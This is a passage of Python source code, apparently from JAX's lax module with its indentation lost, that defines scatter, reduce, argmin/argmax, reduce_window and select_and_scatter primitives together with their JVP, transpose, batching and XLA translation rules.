update_consts, dimension_numbers,
indices_are_sorted, unique_indices):
operand, scatter_indices, updates = primals
g_operand, g_scatter_indices, g_updates = tangents
scatter_dnums = dimension_numbers
updates_shape = updates.shape
val_out = scatter_op.bind(
operand, scatter_indices, updates, update_jaxpr=update_jaxpr,
update_consts=update_consts, dimension_numbers=scatter_dnums,
indices_are_sorted=indices_are_sorted,
unique_indices=unique_indices)
if type(g_operand) is ad_util.Zero and type(g_updates) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
g_operand = ad.instantiate_zeros(g_operand)
g_updates = ad.instantiate_zeros(g_updates)
# gather_dnums and slice_sizes define the gather op that is the inverse of
# the scatter op specified by scatter_dnums
gather_dnums = GatherDimensionNumbers(
offset_dims=scatter_dnums.update_window_dims,
collapsed_slice_dims=scatter_dnums.inserted_window_dims,
start_index_map=scatter_dnums.scatter_dims_to_operand_dims)
slice_sizes = []
pos = 0
for i in range(len(operand.shape)):
if i in scatter_dnums.inserted_window_dims:
slice_sizes.append(1)
else:
slice_sizes.append(updates_shape[scatter_dnums.update_window_dims[pos]])
pos += 1
# For consistency with other max operations, if there are two or more values
# in updates that are contending to replace the same index location, the
# resulting tangent at that location will be the average of the associated
# tangents for the values in updates.
initial_vals = gather(
operand, scatter_indices, gather_dnums, np.array(slice_sizes))
target_vals = gather(
val_out, scatter_indices, gather_dnums, np.array(slice_sizes))
successful_updates = (updates == target_vals)
retained_values = (initial_vals == target_vals)
num_updates = gather(
scatter_add(_zeros(operand),
scatter_indices,
select(successful_updates, _ones(updates), _zeros(updates)),
scatter_dnums),
scatter_indices,
gather_dnums,
np.array(slice_sizes))
num_refs = gather(
scatter_add(_zeros(operand),
scatter_indices,
_ones(updates),
scatter_dnums),
scatter_indices,
gather_dnums,
np.array(slice_sizes))
updates_normalizer = select(retained_values,
1.0 / (num_updates + 1),
1.0 / num_updates)
updates_coef = select(successful_updates,
updates_normalizer,
_zeros(updates))
operand_normalizer = select(retained_values,
1.0 / (num_updates + 1),
_zeros(num_updates))
operand_coef = (-1.0 + operand_normalizer) / num_refs
# This can be simplified once scatter has transpose implemented
target_tangents = gather(
g_operand, scatter_indices, gather_dnums, np.array(slice_sizes))
tangent_updates = (target_tangents * operand_coef +
g_updates * updates_coef)
tangent_out = scatter_add(g_operand,
scatter_indices,
tangent_updates,
scatter_dnums,
indices_are_sorted=indices_are_sorted,
unique_indices=unique_indices)
return val_out, tangent_out
scatter_min_p = standard_primitive(
_scatter_shape_rule, _scatter_dtype_rule, 'scatter-min',
_scatter_translation_rule, weak_type_rule=_argnum_weak_type(0))
batching.primitive_batchers[scatter_min_p] = (
partial(_scatter_batching_rule, scatter_min))
ad.primitive_jvps[scatter_min_p] = partial(_scatter_extremal_jvp, scatter_min_p)
scatter_max_p = standard_primitive(
_scatter_shape_rule, _scatter_dtype_rule, 'scatter-max',
_scatter_translation_rule, weak_type_rule=_argnum_weak_type(0))
batching.primitive_batchers[scatter_max_p] = (
partial(_scatter_batching_rule, scatter_max))
ad.primitive_jvps[scatter_max_p] = partial(_scatter_extremal_jvp, scatter_max_p)
def _scatter_jvp(primals, tangents, *, update_jaxpr, update_consts,
dimension_numbers, indices_are_sorted, unique_indices):
operand, scatter_indices, updates = primals
g_operand, g_scatter_indices, g_updates = tangents
dnums = dimension_numbers
if type(g_operand) is ad_util.Zero and type(g_updates) is ad_util.Zero:
val_out = scatter_p.bind(
operand, scatter_indices, updates, update_jaxpr=update_jaxpr,
update_consts=update_consts, dimension_numbers=dnums,
indices_are_sorted=indices_are_sorted, unique_indices=unique_indices)
return val_out, ad_util.Zero.from_value(val_out)
g_operand = ad.instantiate_zeros(g_operand)
g_updates = ad.instantiate_zeros(g_updates)
# If there are overlapping indices in the scatter, it is unspecified which
# update "wins". So we use the following perhaps surprising scheme:
# a) attach a positive ID to each update in updates, and perform the scatter
# on the IDs
# b) perform the inverse gather on the scattered IDs (similar to
# _scatter_add_transpose).
# c) use the gathered IDs to mask the primal and tangent values.
# d) perform a scatter-add on the masked primal and tangent values. A benefit
# of using scatter-add here is that we don't need a `scatter` transpose
# rule.
# a) attach a positive ID to each update in `updates`, and perform a scatter
# on the IDs.
ids_shape = np.array(updates.shape, dtype=np.int64)
ids_shape[dnums.update_window_dims,] = 1
num_ids = np.prod(ids_shape)
id_dtype = np.uint32 if (num_ids + 1) < np.iinfo(np.uint32).max else np.uint64
update_ids = add(reshape(iota(id_dtype, num_ids), ids_shape),
_ones(updates, dtype=id_dtype))
scattered_ids = scatter(full(operand.shape, 0, id_dtype),
scatter_indices, update_ids, dnums,
indices_are_sorted=indices_are_sorted,
unique_indices=unique_indices)
# b) compute the inverse gather that "undoes" the scatter on the id values.
gather_dnums = GatherDimensionNumbers(
offset_dims=dnums.update_window_dims,
collapsed_slice_dims=dnums.inserted_window_dims,
start_index_map=dnums.scatter_dims_to_operand_dims)
slice_sizes = []
pos = 0
for i in range(len(scattered_ids.shape)):
if i in dnums.inserted_window_dims:
slice_sizes.append(1)
else:
slice_sizes.append(updates.shape[dnums.update_window_dims[pos]])
pos += 1
gathered_update_ids = gather(scattered_ids, scatter_indices,
dimension_numbers=gather_dnums,
slice_sizes=slice_sizes)
# c) mask off input elements that do not correspond to a primal output.
masked_operand = select(eq(scattered_ids, _zeros(scattered_ids)),
operand, _zeros(operand))
masked_updates = select(eq(update_ids, gathered_update_ids),
updates, _zeros(updates))
masked_g_operand = select(eq(scattered_ids, _zeros(scattered_ids)),
g_operand, _zeros(g_operand))
masked_g_updates = select(eq(update_ids, gathered_update_ids),
g_updates, _zeros(g_updates))
# d) perform scatter-adds to compute the primal and tangent outputs.
val_out = scatter_add(masked_operand, scatter_indices, masked_updates,
dimension_numbers=dnums,
indices_are_sorted=indices_are_sorted,
unique_indices=unique_indices)
tangent_out = scatter_add(masked_g_operand, scatter_indices, masked_g_updates,
dimension_numbers=dnums,
indices_are_sorted=indices_are_sorted,
unique_indices=unique_indices)
return val_out, tangent_out
scatter_p = standard_primitive(
_scatter_shape_rule, _scatter_dtype_rule, 'scatter',
_scatter_translation_rule, weak_type_rule=_argnum_weak_type(0))
ad.primitive_jvps[scatter_p] = _scatter_jvp
batching.primitive_batchers[scatter_p] = (
partial(_scatter_batching_rule, scatter))
def _reduce_shape_rule(*avals, computation, jaxpr, consts, dimensions):
operand_avals, init_val_avals = split_list(avals, [len(avals) // 2])
if any(arg.shape != () for arg in init_val_avals):
init_val_shapes = [a.shape for a in init_val_avals]
raise ValueError(f'reduce found non-scalar initial value: {init_val_shapes}')
return [tuple(np.delete(op.shape, dimensions)) for op in operand_avals]
def _reduce_dtype_rule(*avals, computation, jaxpr, consts, dimensions):
operand_avals, init_val_avals = split_list(avals, [len(avals) // 2])
operand_dtypes = [dtypes.canonicalize_dtype(op.dtype) for op in operand_avals]
init_val_dtypes = [dtypes.canonicalize_dtype(init.dtype) for init in init_val_avals]
if operand_dtypes != init_val_dtypes:
raise TypeError(
"reduce operand dtypes should match corresponding initial value dtypes, "
f"got operands={operand_avals} and initial_values={init_val_avals}")
return operand_dtypes
def _reduce_weak_type_rule(*avals, computation, jaxpr, consts, dimensions):
operand_avals, init_val_avals = split_list(avals, [len(avals) // 2])
return [op.weak_type and init_val.weak_type
for op, init_val in safe_zip(operand_avals, init_val_avals)]
def _reduce_translation_rule(c, *values, computation, jaxpr,
consts, dimensions):
operands, init_values = split_list(values, [len(values) // 2])
if len(operands) == 1:
init_value = init_values[0]
xla_computation = _reduction_computation(c, jaxpr, consts, init_value)
out = xops.Reduce(c, operands, init_values, xla_computation, dimensions)
return xops.Tuple(c, (out,))
xla_computation = _reduction_computation(c, jaxpr, consts, init_values, singleton=False)
return xops.Reduce(c, operands, init_values, xla_computation, dimensions)
def _reduce_batch_rule(batched_args, batch_dims, *, computation, jaxpr,
consts, dimensions):
num_operands = len(batched_args) // 2
operands, init_values = split_list(batched_args, [num_operands])
operand_bdims, init_value_bdims = split_list(batch_dims, [num_operands])
if all(init_value_bdim is None for init_value_bdim in init_value_bdims):
# Assume all batch dims are the same for each of the operands
assert all(operand_bdim is not None for operand_bdim in operand_bdims)
assert all(operand_bdim == operand_bdims[0] for operand_bdim in operand_bdims)
# TODO(sharadmv): handle the case when batch dims are different across
# operands or when some are unbatched
operand_bdim = operand_bdims[0]
new_dimensions = [d + bool(d >= operand_bdim) for d in dimensions]
new_operand_bdim = operand_bdim - int(np.sum(np.less(dimensions, operand_bdim)))
new_operand_bdims = [new_operand_bdim] * num_operands
return reduce_p.bind(*(operands + init_values),
computation=computation, dimensions=tuple(new_dimensions),
consts=consts,
jaxpr=jaxpr), new_operand_bdims
else:
raise NotImplementedError # loop and stack
def _reduction_computation(c, jaxpr, consts, init_values, singleton=True):
if singleton:
init_values = [init_values]
shapes = safe_map(c.get_shape, init_values + init_values)
axis_env = xla.AxisEnv(1, (), ()) # no parallel primitives inside reductions
subc = xla_bridge.make_computation_builder("reduction_computation")
assert len(consts) == 0, "Reduction computations cannot have constants"
args = [xb.parameter(subc, i, shape) for i, shape in enumerate(shapes)]
out_nodes = xla.jaxpr_subcomp(subc, jaxpr, None, axis_env, consts, '', *args)
if singleton:
return subc.build(out_nodes[0])
out_nodes = xops.Tuple(subc, out_nodes)
return subc.build(out_nodes)
def _masking_defreducer(prim, identity):
masking.masking_rules[prim] = partial(_reducer_masking_rule, prim, identity)
def _reducer_masking_rule(prim, identity, padded_vals, logical_shapes,
axes, input_shape=None, **reduce_kwargs):
(padded_val,), (logical_shape,) = padded_vals, logical_shapes
padded_shape = masking.padded_shape_as_value(padded_val.shape)
masks = [broadcasted_iota(np.int32, padded_shape, i) < d
for i, d in enumerate(logical_shape) if i in axes]
mask = _reduce(operator.and_, masks)
masked_val = select(mask, padded_val, identity(padded_shape, padded_val.dtype))
prim_bind = partial(prim.bind, **reduce_kwargs)
bind = prim_bind if input_shape is None else partial(prim_bind, input_shape=padded_shape)
return bind(masked_val, axes=axes)
reduce_p = core.Primitive('reduce')
reduce_p.multiple_results = True
reduce_p.def_impl(partial(xla.apply_primitive, reduce_p))
reduce_p.def_abstract_eval(
partial(standard_multi_result_abstract_eval, reduce_p, _reduce_shape_rule,
_reduce_dtype_rule, _reduce_weak_type_rule))
xla.translations[reduce_p] = _reduce_translation_rule
batching.primitive_batchers[reduce_p] = _reduce_batch_rule
def _reduce_number_dtype_rule(name, operand, *args, **kw):
if not dtypes.issubdtype(operand.dtype, np.number):
raise TypeError("{} does not accept dtype {}. Accepted dtypes are subtypes "
"of number.".format(name, np.dtype(operand.dtype).name))
return dtypes.canonicalize_dtype(operand.dtype)
def _reduce_sum_shape_rule(operand, *, axes):
return _reduce_op_shape_rule(operand, axes=axes)
def _reduce_sum_translation_rule(c, operand, *, axes):
shape = c.get_shape(operand)
dtype = shape.numpy_dtype()
scalar = ShapedArray((), dtype)
return xops.Reduce(c, [operand], [xb.constant(c, np.array(0, dtype))],
xla.primitive_subcomputation(add_p, scalar, scalar),
axes)
def _reduce_sum_transpose_rule(cotangent, operand, *, axes):
assert ad.is_undefined_primal(operand)
input_shape = operand.aval.shape
broadcast_dimensions = tuple(np.delete(np.arange(len(input_shape)), axes))
result = broadcast_in_dim(cotangent, input_shape, broadcast_dimensions)
assert result.shape == input_shape
return [result]
reduce_sum_p = standard_primitive(
_reduce_sum_shape_rule, partial(_reduce_number_dtype_rule, 'reduce_sum'),
'reduce_sum', _reduce_sum_translation_rule)
ad.deflinear2(reduce_sum_p, _reduce_sum_transpose_rule)
batching.defreducer(reduce_sum_p)
_masking_defreducer(reduce_sum_p,
lambda shape, dtype: np.broadcast_to(np.array(0, dtype), shape))
def _reduce_op_shape_rule(operand, *, axes, input_shape=None):
del input_shape # Unused.
if len(axes) != len(set(axes)):
raise ValueError(f"duplicate value in 'axes' of reduction: {axes}")
if not all(0 <= a < operand.ndim for a in axes):
raise ValueError(f"reduction axes {axes} contains out-of-bounds indices for {operand}.")
return tuple(np.delete(operand.shape, axes))
def _reduce_prod_translation_rule(c, operand, *, axes):
dtype = c.get_shape(operand).numpy_dtype()
scalar = ShapedArray((), dtype)
return xops.Reduce(c, [operand], [xb.constant(c, np.array(1, dtype))],
xla.primitive_subcomputation(mul_p, scalar, scalar), axes)
def _reduce_prod_jvp_rule(primals, tangents, *, axes):
operand, = primals
tangent, = tangents
input_shape = np.array(operand.shape)
n = np.prod(input_shape[list(axes)])
non_axes = np.delete(np.arange(len(input_shape)), axes)
# Move the reduced axes to the front, and flatten them to 1D.
permutation = axes + tuple(non_axes)
new_shape = (n,) + tuple(input_shape[non_axes])
operand = reshape(operand, new_shape, permutation)
tangent = reshape(tangent, new_shape, permutation)
def _reduce_prod_tree(x, axis=0):
"""Reduce by repeatedly splitting the array and multiplying."""
while x.shape[axis] > 1:
n = x.shape[axis]
n1 = (n + 1) // 2
n2 = n - n1
x1 = slice_in_dim(x, 0, n1)
x2 = slice_in_dim(x, n1, None)
if n2 != n1:
paddings = [(0, 0, 0)] * len(x.shape)
paddings[axis] = (0, 1, 0)
x2 = pad(x2, _const(x, 1), paddings)
x = x1 * x2
if x.shape[axis] == 0:
return full(input_shape[non_axes], _one(x))
return squeeze(x, (axis,))
return api.jvp(_reduce_prod_tree, (operand,), (tangent,))
reduce_prod_p = standard_primitive(
_reduce_op_shape_rule, partial(_reduce_number_dtype_rule, 'reduce_prod'),
'reduce_prod', _reduce_prod_translation_rule)
ad.primitive_jvps[reduce_prod_p] = _reduce_prod_jvp_rule
batching.defreducer(reduce_prod_p)
_masking_defreducer(reduce_prod_p,
lambda shape, dtype: np.broadcast_to(np.array(1, dtype), shape))
def _reduce_chooser_shape_rule(operand, *, axes):
return tuple(np.delete(operand.shape, axes))
def _reduce_chooser_translation_rule(prim, identity, c, operand, *, axes):
dtype = c.get_shape(operand).numpy_dtype()
scalar = ShapedArray((), dtype)
return xops.Reduce(c, [operand], [xb.constant(c, identity(dtype))],
xla.primitive_subcomputation(prim, scalar, scalar), axes)
def _reduce_chooser_jvp_rule(g, ans, operand, *, axes):
# TODO(mattjj): an alternative is to use variadic reduce to compute the chosen
# locations in a single pass (rather than comparing equality) and use a
# gather, and/or even push along the chosen elements of g (b/112040122)
shape = [1 if i in axes else d for i, d in enumerate(operand.shape)]
location_indicators = convert_element_type(
_eq_meet(operand, reshape(ans, shape)), g.dtype)
counts = _reduce_sum(location_indicators, axes)
return div(_reduce_sum(mul(g, location_indicators), axes), counts)
_reduce_max_translation_rule = partial(_reduce_chooser_translation_rule, max_p,
_get_max_identity)
reduce_max_p = standard_primitive(_reduce_op_shape_rule, _input_dtype,
'reduce_max', _reduce_max_translation_rule)
ad.defjvp2(reduce_max_p, _reduce_chooser_jvp_rule)
batching.defreducer(reduce_max_p)
_masking_defreducer(reduce_max_p,
lambda shape, dtype: np.broadcast_to(np.array(-np.inf, dtype), shape))
_reduce_min_translation_rule = partial(
_reduce_chooser_translation_rule, min_p, _get_min_identity)
reduce_min_p = standard_primitive(_reduce_op_shape_rule, _input_dtype,
'reduce_min', _reduce_min_translation_rule)
ad.defjvp2(reduce_min_p, _reduce_chooser_jvp_rule)
batching.defreducer(reduce_min_p)
_masking_defreducer(reduce_min_p,
lambda shape, dtype: np.broadcast_to(np.array(np.inf, dtype), shape))
def _argminmax_shape_rule(operand, *, axes, index_dtype):
axis, = axes
return tuple(np.delete(operand.shape, axis))
def _argminmax_dtype_rule(operand, *, axes, index_dtype):
if not dtypes.issubdtype(index_dtype, np.integer):
raise TypeError("index_dtype must be an integer type, but got {}"
.format(np.dtype(index_dtype).name))
return index_dtype
def _argminmax_translation_rule(value_comparator, identity,
c, operand, *, axes, index_dtype):
axis, = axes
shape = c.get_shape(operand)
dtype = shape.numpy_dtype()
subc = xb.make_computation_builder("argminmax_comparator")
value_shape = xc.Shape.array_shape(shape.xla_element_type(), ())
index_shape = xc.Shape.array_shape(index_dtype, ())
x_value = xb.parameter(subc, 0, value_shape)
x_index = xb.parameter(subc, 1, index_shape)
y_value = xb.parameter(subc, 2, value_shape)
y_index = xb.parameter(subc, 3, index_shape)
which_value = value_comparator(x_value, y_value)
which_index = xops.Or(which_value, xops.And(xops.Eq(x_value, y_value),
xops.Lt(x_index, y_index)))
xops.Tuple(subc, [xops.Select(which_value, x_value, y_value),
xops.Select(which_index, x_index, y_index)])
comparator = subc.build()
iota_shape = xc.Shape.array_shape(index_dtype, shape.dimensions())
iota = xc.ops.Iota(c, iota_shape, axis)
out = xops.Reduce(
c, [operand, iota],
[xb.constant(c, identity(dtype)),
xb.constant(c, np.array(0, index_dtype))], comparator, [axis])
return xops.GetTupleElement(out, 1)
def _argminmax_gpu_translation_rule(op, a, *, axes, index_dtype):
axis, = axes
idxs = tie_in(a, broadcasted_iota(index_dtype, a.shape, axis))
maxval = np.array(dtypes.iinfo(index_dtype).max, dtype=index_dtype)
maxval = broadcast(tie_in(a, maxval), a.shape)
mask_idxs = select(eq(a, expand_dims(op(a, (axis,)), (axis,))), idxs,
maxval)
return _reduce_min(mask_idxs, (axis,))
_argmin_translation_rule = partial(_argminmax_translation_rule, xops.Lt,
_get_min_identity)
_argmax_translation_rule = partial(_argminmax_translation_rule, xops.Gt,
_get_max_identity)
argmin_p = standard_primitive(_argminmax_shape_rule, _argminmax_dtype_rule,
'argmin', _argmin_translation_rule,
weak_type_rule=_strip_weak_type)
batching.defreducer(argmin_p)
ad.defjvp_zero(argmin_p)
xla.backend_specific_translations['gpu'][argmin_p] = xla.lower_fun(
partial(_argminmax_gpu_translation_rule, _reduce_min),
multiple_results=False)
argmax_p = standard_primitive(_argminmax_shape_rule, _argminmax_dtype_rule,
'argmax', _argmax_translation_rule,
weak_type_rule=_strip_weak_type)
batching.defreducer(argmax_p)
ad.defjvp_zero(argmax_p)
xla.backend_specific_translations['gpu'][argmax_p] = xla.lower_fun(
partial(_argminmax_gpu_translation_rule, _reduce_max),
multiple_results=False)
def _reduce_logical_shape_rule(operand, *, axes):
if operand.dtype != np.bool_:
msg = "logical reduction requires operand dtype bool, got {}."
raise TypeError(msg.format(operand.dtype))
return tuple(np.delete(operand.shape, axes))
def _reduce_logical_translation_rule(prim, identity, c, operand, *, axes):
scalar = ShapedArray((), np.bool_)
return xops.Reduce(c, [operand], [xb.constant(c, identity(np.bool_))],
xla.primitive_subcomputation(prim, scalar, scalar), axes)
_reduce_or_translation_rule = partial(_reduce_logical_translation_rule,
or_p, _get_max_identity)
reduce_or_p = standard_primitive(_reduce_logical_shape_rule, _fixed_dtype(np.bool_),
'reduce_or', _reduce_or_translation_rule,
weak_type_rule=_strip_weak_type)
batching.defreducer(reduce_or_p)
_reduce_and_translation_rule = partial(_reduce_logical_translation_rule,
and_p, _get_min_identity)
reduce_and_p = standard_primitive(_reduce_logical_shape_rule, _fixed_dtype(np.bool_),
'reduce_and', _reduce_and_translation_rule,
weak_type_rule=_strip_weak_type)
batching.defreducer(reduce_and_p)
def _reduce_window_shape_rule(operand, init_value, *, jaxpr, consts,
window_dimensions, window_strides, padding,
base_dilation, window_dilation):
if operand.dtype != init_value.dtype:
msg = ("reduce_window got inconsistent dtypes for operand and init_value: "
" got operand dtype {} and init_value dtype {}.")
raise TypeError(msg.format(operand.dtype, init_value.dtype))
if init_value.shape != ():
msg = ("reduce_window expected init_value to be a scalar but init_value "
"has shape {}.")
raise TypeError(msg.format(init_value.shape))
return _common_reduce_window_shape_rule(
operand, window_dimensions, window_strides, padding, base_dilation,
window_dilation)
def _reduce_window_translation_rule(c, operand, init_value, *, jaxpr, consts,
window_dimensions, window_strides, padding,
base_dilation, window_dilation):
xla_computation = _reduction_computation(c, jaxpr, consts, init_value)
return xops.ReduceWindowWithGeneralPadding(
operand, init_value, xla_computation, window_dimensions,
window_strides, base_dilation, window_dilation, padding)
def _generic_reduce_window_batch_rule(
batched_args, batch_dims, *, jaxpr, consts, window_dimensions,
window_strides, padding, base_dilation, window_dilation):
operand, init = batched_args
bdim, init_bdim = batch_dims
if init_bdim is not None:
raise NotImplementedError("reduce_window batching is not implemented for "
"initial values")
def reduce_window(x, window_dimensions, window_strides, padding, base_dilation,
window_dilation):
return reduce_window_p.bind(
x, init, jaxpr=jaxpr, consts=consts, window_dimensions=window_dimensions,
window_strides=window_strides, padding=padding, base_dilation=base_dilation,
window_dilation=window_dilation)
return _reduce_window_batch_rule(
reduce_window, (operand,), (bdim,), window_dimensions=window_dimensions,
window_strides=window_strides, padding=padding, base_dilation=base_dilation,
window_dilation=window_dilation)
reduce_window_p = standard_primitive(
_reduce_window_shape_rule, _input_dtype, 'reduce_window',
_reduce_window_translation_rule)
batching.primitive_batchers[reduce_window_p] = _generic_reduce_window_batch_rule
def _reduce_window_sum_shape_rule(operand, *, window_dimensions, window_strides,
padding, base_dilation, window_dilation):
if not dtypes.issubdtype(operand.dtype, np.number):
msg = "operand to reduce_window_sum must have a number dtype, got {}"
raise TypeError(msg.format(np.dtype(operand.dtype).name))
return _common_reduce_window_shape_rule(operand, window_dimensions,
window_strides, padding, base_dilation,
window_dilation)
def _reduce_window_sum_translation_rule(c, operand, *, window_dimensions,
window_strides, padding, base_dilation,
window_dilation):
dtype = c.get_shape(operand).numpy_dtype()
scalar = ShapedArray((), dtype)
return xops.ReduceWindowWithGeneralPadding(
operand, xb.constant(c, np.array(0, dtype)),
xla.primitive_subcomputation(add_p, scalar, scalar), window_dimensions,
window_strides, base_dilation, window_dilation, padding)
def _reduce_window_sum_transpose_rule(cotangent, operand, *, window_dimensions,
window_strides, padding, base_dilation,
window_dilation):
assert ad.is_undefined_primal(operand)
input_shape = operand.aval.shape
pads = _conv_general_vjp_lhs_padding(
input_shape, window_dimensions, window_strides, cotangent.shape, padding,
base_dilation, window_dilation)
ones = [1] * len(input_shape)
padding_config = [(lo, hi, stride - 1)
for (lo, hi), stride in zip(pads, window_strides)]
pad_cotangent = pad(cotangent, _zero(cotangent), padding_config)
result = _reduce_window_sum(pad_cotangent, window_dimensions, base_dilation,
[(0, 0)] * len(input_shape),
base_dilation=ones,
window_dilation=window_dilation)
assert result.shape == input_shape, (result.shape, input_shape)
return [result]
def _reduce_window_batch_rule(reduce_window, batched_args, bdims, *,
window_dimensions, window_strides, padding,
base_dilation, window_dilation):
operand, = batched_args
bdim, = bdims
if bdim is not None:
window_dimensions = \
window_dimensions[:bdim] + (1,) + window_dimensions[bdim:]
window_strides = window_strides[:bdim] + (1,) + window_strides[bdim:]
padding = padding[:bdim] + ((0, 0),) + padding[bdim:]
base_dilation = base_dilation[:bdim] + (1,) + base_dilation[bdim:]
window_dilation = window_dilation[:bdim] + (1,) + window_dilation[bdim:]
operand = reduce_window(operand, window_dimensions, window_strides, padding,
base_dilation, window_dilation)
return operand, bdim
reduce_window_sum_p = standard_primitive(
_reduce_window_sum_shape_rule, _input_dtype, 'reduce_window_sum',
_reduce_window_sum_translation_rule)
ad.deflinear2(reduce_window_sum_p, _reduce_window_sum_transpose_rule)
batching.primitive_batchers[reduce_window_sum_p] = partial(
_reduce_window_batch_rule, _reduce_window_sum)
def _reduce_window_chooser_translation_rule(
prim, identity, c, operand, *, window_dimensions, window_strides, padding,
base_dilation, window_dilation):
dtype = c.get_shape(operand).numpy_dtype()
scalar = ShapedArray((), dtype)
return xops.ReduceWindowWithGeneralPadding(
operand, xb.constant(c, identity(dtype)),
xla.primitive_subcomputation(prim, scalar, scalar), window_dimensions,
window_strides, base_dilation, window_dilation, padding)
def _reduce_window_chooser_jvp_rule(prim, g, operand, *, window_dimensions,
window_strides, padding, base_dilation,
window_dilation):
assert prim is max_p or prim is min_p
select_prim = ge_p if prim is max_p else le_p
return _select_and_gather_add(g, operand, select_prim, window_dimensions,
window_strides, padding, base_dilation,
window_dilation)
def _common_reduce_window_shape_rule(operand, window_dimensions,
window_strides, padding, base_dilation,
window_dilation):
_check_shapelike("reduce_window", "window_dimensions", window_dimensions,
non_zero_shape=True)
_check_shapelike("reduce_window", "window_strides", window_strides,
non_zero_shape=True)
_check_shapelike("reduce_window", "base_dilation", base_dilation)
_check_shapelike("reduce_window", "window_dilation", window_dilation)
if operand.ndim != len(window_dimensions):
msg = ("reduce_window got the wrong number of window_dimensions for "
"operand: got operand shape {} with window_dimensions {}.")
raise TypeError(msg.format(operand.shape, window_dimensions))
if len(window_strides) != len(window_dimensions):
msg = ("reduce_window got inconsistent window_strides and "
"window_dimensions: got window_strides {} and window_dimensions {}.")
raise TypeError(msg.format(window_strides, window_dimensions))
if len(base_dilation) != len(window_dimensions):
msg = ("reduce_window got inconsistent base_dilation and "
"window_dimensions: got base_dilation {} and window_dimensions {}.")
raise TypeError(msg.format(base_dilation, window_dimensions))
if len(window_dilation) != len(window_dimensions):
msg = ("reduce_window got inconsistent window_dilation and "
"window_dimensions: got window_dilation {} and window_dimensions "
"{}.")
raise TypeError(msg.format(window_dilation, window_dimensions))
return reduce_window_shape_tuple(operand.shape, window_dimensions,
window_strides, padding, base_dilation,
window_dilation)
def reduce_window_shape_tuple(operand_shape, window_dimensions, window_strides,
padding, base_dilation=None,
window_dilation=None):
if base_dilation is not None:
operand_shape = _dilate_shape(operand_shape, base_dilation)
if window_dilation is not None:
window_dimensions = _dilate_shape(window_dimensions, window_dilation)
operand_padded = np.add(operand_shape, np.add(*zip(*padding)))
t = np.floor_divide(
np.subtract(operand_padded, window_dimensions), window_strides) + 1
return tuple(t)
_reduce_window_max_translation_rule = partial(
_reduce_window_chooser_translation_rule, max_p, _get_max_identity)
reduce_window_max_p = standard_primitive(
_common_reduce_window_shape_rule, _input_dtype, 'reduce_window_max',
_reduce_window_max_translation_rule)
ad.defjvp(reduce_window_max_p, partial(_reduce_window_chooser_jvp_rule, max_p))
batching.primitive_batchers[reduce_window_max_p] = partial(
_reduce_window_batch_rule, _reduce_window_max)
_reduce_window_min_translation_rule = partial(
_reduce_window_chooser_translation_rule, min_p, _get_min_identity)
reduce_window_min_p = standard_primitive(
_common_reduce_window_shape_rule, _input_dtype, 'reduce_window_min',
_reduce_window_min_translation_rule)
ad.defjvp(reduce_window_min_p, partial(_reduce_window_chooser_jvp_rule, min_p))
_reduce_window_min_batch_rule = partial(_reduce_window_batch_rule,
_reduce_window_min)
batching.primitive_batchers[reduce_window_min_p] = partial(
_reduce_window_batch_rule, _reduce_window_min)
def _select_and_scatter_shape_rule(
operand, source, init_value, *, select_jaxpr, select_consts, scatter_jaxpr,
scatter_consts, window_dimensions, window_strides, padding):
_check_shapelike("select_and_scatter", "window_dimensions", window_dimensions)
_check_shapelike("select_and_scatter", "window_strides", window_strides)
if len(window_dimensions) != len(window_strides):
msg = ("select_and_scatter got inconsistent window_strides and "
"window_dimensions: got window_strides {} and window_dimensions {}.")
raise TypeError(msg.format(window_strides, window_dimensions))
return operand.shape
def _select_and_scatter_translation(
c, operand, source, init_value, *, select_jaxpr, select_consts, scatter_jaxpr,
scatter_consts, window_dimensions, window_strides, padding):
select = _reduction_computation(c, select_jaxpr, select_consts, init_value)
scatter = _reduction_computation(c, scatter_jaxpr, scatter_consts, init_value)
return xops.SelectAndScatterWithGeneralPadding(
operand, select, window_dimensions, window_strides, padding, source,
init_value, scatter)
select_and_scatter_p = standard_primitive(
_select_and_scatter_shape_rule, _input_dtype, 'select_and_scatter',
_select_and_scatter_translation)
def _select_and_scatter_add_shape_rule(
source, operand, *, select_prim, window_dimensions, window_strides,
padding):
return operand.shape
def _select_and_scatter_add_translation(
c, source, operand, *, select_prim, window_dimensions, window_strides,
padding):
dtype = c.get_shape(operand).numpy_dtype()
scalar = ShapedArray((), dtype)
select = xla.primitive_subcomputation(select_prim, scalar, scalar)
scatter = xla.primitive_subcomputation(add_p, scalar, scalar)
zero = xb.constant(c, np.array(0, dtype))
return xops.SelectAndScatterWithGeneralPadding(
operand, select, window_dimensions, window_strides, padding, source, zero,
scatter)
def _select_and_scatter_add_jvp(
primals, tangents, *, select_prim, window_dimensions, window_strides,
padding):
source, operand = primals
g_source, g_operand = tangents
val_out = _select_and_scatter_add(
source, operand, select_prim, window_dimensions, window_strides,
padding)
del g_operand
if type(g_source) is ad_util.Zero:
tangent_out = ad_util.Zero.from_value(val_out)
else:
tangent_out = _select_and_scatter_add(
g_source, operand, select_prim, window_dimensions,
window_strides, padding)
return val_out, tangent_out
def _select_and_scatter_add_transpose(
t, source, operand, *, select_prim, window_dimensions, window_strides,
padding):
assert ad.is_undefined_primal(source) and not ad.is_undefined_primal(operand)
ones = (1,) * len(window_dimensions)
source_t = _select_and_gather_add(t, operand, select_prim, window_dimensions,
window_strides, padding, ones, ones)
return [source_t, None]
def _select_and_scatter_add_batch_rule(
batched_args, batch_dims, *, select_prim, window_dimensions, window_strides,
padding):
source, operand = batched_args
s_bdim, o_bdim = batch_dims
size = next(a.shape[bdim] for a, bdim in zip(batched_args, batch_dims)
if bdim is not None)
source = batching.bdim_at_front(source, s_bdim, size)
operand = batching.bdim_at_front(operand, o_bdim, size)
window_dimensions = (1,) + window_dimensions
window_strides = (1,) + window_strides
padding = ((0, 0),) + padding
out = _select_and_scatter_add(source, operand, select_prim, window_dimensions,
window_strides, padding)
return out, 0
select_and_scatter_add_p = standard_primitive(
_select_and_scatter_add_shape_rule, _input_dtype, 'select_and_scatter_add',
_select_and_scatter_add_translation)
ad.primitive_transposes[select_and_scatter_add_p] = \
_select_and_scatter_add_transpose
ad.primitive_jvps[select_and_scatter_add_p] = _select_and_scatter_add_jvp
batching.primitive_batchers[select_and_scatter_add_p] = \
_select_and_scatter_add_batch_rule
def _select_and_gather_add_shape_rule(
tangents, operand, *, select_prim, window_dimensions, window_strides,
padding, base_dilation, window_dilation):
if tangents.shape != operand.shape:
msg = ("select_and_gather_add tangents and operand shapes must match, "
"got {} and {}.")
raise TypeError(msg.format(tangents.shape, operand.shape))
